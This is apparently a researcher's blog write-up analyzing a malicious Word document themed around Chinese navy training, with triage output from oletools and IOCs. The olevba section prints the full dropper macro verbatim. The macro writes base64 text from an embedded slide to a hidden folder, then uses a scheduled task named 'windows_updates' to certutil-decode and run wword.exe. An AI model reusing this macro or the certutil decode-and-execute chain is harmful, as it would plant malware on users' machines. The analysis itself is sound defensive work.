China Navy First Training 2024(CN).docx — Malware Analysis Report
I recently set out on my regular adventure in search of malware samples to analyze.
I came across the following submission in Malware Bazaar from smica83.
I thought I’d write about what I found.
Lets get started
I was able to confirm that we are working with a .DOCX MS Office file by using TrID.
remnux@remnux:~/Desktop/samples$ trid 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found: 14909
Analyzing...
Collecting data from file: 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
51.0% (.DOCX) Word Microsoft Office Open XML Format document (23500/1/4)
38.0% (.ZIP) Open Packaging Conventions container (17500/1/4)
8.6% (.ZIP) ZIP compressed archive (4000/1)
2.1% (.PG/BIN) PrintFox/Pagefox bitmap (640x800) (1000/1)Judging from all the information we’ve gathered so far, I believe we are dealing with some sort of info/file stealer.I then ran Oleid on the sample and confirmed the use of VBA macros in this Word document.
remnux@remnux:~/Desktop/samples$ oleid 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
oleid 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
Filename: 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
--------------------+--------------------+----------+--------------------------
Indicator |Value |Risk |Description
--------------------+--------------------+----------+--------------------------
File format |MS Word 2007+ |info |
|Document (.docx) | |
--------------------+--------------------+----------+--------------------------
Container format |OpenXML |info |Container type
--------------------+--------------------+----------+--------------------------
Encrypted |False |none |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros |Yes |Medium |This file contains VBA
| | |macros. No suspicious
| | |keyword was found. Use
| | |olevba and mraptor for
| | |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros |No |none |This file does not contain
| | |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External |1 |HIGH |External relationships
Relationships | | |found: attachedTemplate -
| | |use oleobj for details
--------------------+--------------------+----------+--------------------------Next, I ran Olevba to find what macros were hiding.
remnux@remnux:~/Desktop/samples$ olevba 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.1 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: 2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
Type: OpenXML
WARNING Returned info is not complete for PPT types!
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: None - OLE stream: 'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub BracnchExecution()
CheckFileInFolder
ScheduleTask
End Sub
Sub CheckFileInFolder()
Dim folderPath As String
Dim fileName As String
Dim fullPath As String
folderPath = "C:\~Microsoft365"
fileName = "support.txt"
fullPath = folderPath & "\" & fileName
If Dir(fullPath) <> "" Then
MsgBox "File not supported!!"
Else
Textbox_reader
End If
End Sub
Sub Test()
Dim Charts_Path As String
Charts_Path = "C:\~Microsoft365"
If Dir(Charts_Path, vbDirectory) = "" Then MkDir Charts_Path
SetAttr "C:\~Microsoft365", vbHidden Or vbSystem
End Sub
Sub Textbox_reader()
Test
Dim myInput As String
myInput = ActivePresentation.Slides(1).Shapes(1).TextFrame.TextRange.Text
Set textFile = CreateObject("Scripting.FileSystemObject").CreateTextFile("C:\~Microsoft365\support.txt", True)
textFile.Write myInput
textFile.Close
End Sub
Sub ScheduleTask()
Dim strCommand As String
strCommand = "schtasks /create /TN windows_updates /SC ONCE /ST 11:11 /TR ""cmd /c certutil -decode C:\~Microsoft365\support.txt C:\~Microsoft365\wword.exe && C:\~Microsoft365\wword.exe"""
Shell "cmd /c " & strCommand, vbHide
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Write |May write to a file (if combined with Open) |
|Suspicious|CreateTextFile |May create a text file |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|vbHide |May run an executable file or a system |
| | |command |
|Suspicious|create |May execute file or a system command through |
| | |WMI |
|Suspicious|MkDir |May create a directory |
|Suspicious|CreateObject |May create an OLE object |
|IOC |wword.exe |Executable file name |
+----------+--------------------+---------------------------------------------+INTERESTING…
Looking at the VBA code, it seems like this macro is designed to extract text from the textbox inside the first shape and presentation slide.
It looks like the macro then proceeds to create a new text file named support.txt and store the contents of the textbox within the file.
Finally, the macro uses the Windows binary Certutil.exe to Base64 decode and create a new executable called wword.exe. (To learn more about how Certutil.exe can be exploited, check it out on the LOLBAS project.)
This is neatly wrapped up inside a scheduled task named windows_updates for the purpose of automatic execution.
Now it’s getting fun!
So, as I mentioned above, Certutil is decoding some base64-encoded data and saving the output to an executable. That got me really thinking:
- What is this Base64 data, and how can we view it?
- Also, why was text being pulled from the presentation slides when we are dealing with a .DOCX file here?
I changed the sample extension from .DOCX to .ZIP, which allowed me to unzip the contents and dive deeper.
After some time, I stumbled across a directory named “embeddings” which contained a .PPT file named “Microsoft_PowerPoint_97–2003_Presentation”.
remnux@remnux:~/Desktop/samples/sample-unzipped$ ls
'[Content_Types].xml' docProps _rels word
remnux@remnux:~/Desktop/samples/sample-unzipped$ cd word/
remnux@remnux:~/Desktop/samples/sample-unzipped/word$ ls
document.xml embeddings endnotes.xml fontTable.xml footer1.xml footnotes.xml media numbering.xml _rels settings.xml styles.xml theme webSettings.xml
remnux@remnux:~/Desktop/samples/sample-unzipped/word$ cd embeddings/
remnux@remnux:~/Desktop/samples/sample-unzipped/word/embeddings$ ls
Microsoft_PowerPoint_97-2003_Presentation.pptRunning this presentation file through Oleid and Olevba, I got the same results as when I analyzed the DOC sample from before.
So how am I going to extract this Base64 string safely?
Python-PPTX
Python-pptx is a Python library for creating, reading, and updating PowerPoint (.pptx) files.
After converting our .PPT PowerPoint file to .PPTX (required as python-pptx doesn’t support .ppt files), I used this python script to extract the Base64 encoded string from the slide.
from pptx import Presentation
pr_file = "Microsoft_PowerPoint_97-2003_Presentation.pptx"
presentation = Presentation(pr_file)
slide_index = 0
shape_index = 0
slide = presentation.slides[slide_index]
shape = slide.shapes[shape_index]
if shape.has_text_frame:
text = shape.text_frame.text
print("Text inside the shape:",text)
else:
print("Shape does not contain text.")The result was a very long Base64-encoded string, and after popping it into CyberChef to decode it, I realized it was the compiled code to a PE file.
I found this cool website to convert a Base64-encoded string back into its original executable file (.exe) format. After doing that, I now have a PE to work with.
We’ll continue analyzing this PE in Part 2 of this malware analysis.
VirusTotal
At the time of writing this post, VirusTotal reports 10 vendor detections for the .DOCX file.
We can see that VirusTotal suggests it’s a downloader, which we will touch more on in Part 2 of this write-up.
IOCs
Hash (SHA-256):
2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3File names:
2027a5acbfea586f2d814fb57a97dcfce6c9d85c2a18a0df40811006d74aa7e3.doc
China Navy First Training 2024(CN) (copy 1).docx
China Navy First Training 2024(CN).docxStrings:
word/embeddings/Microsoft_PowerPoint_97-2003_Presentation.pptIn the next stage of this report, I will dive deeper into the executable that we extracted from this document and try to get a better idea of what its purpose is.
Click here to view Part 2 of this malware analysis report.
Feel free to reach out to me on Twitter (@AndrewPetrus) for any questions or comments.
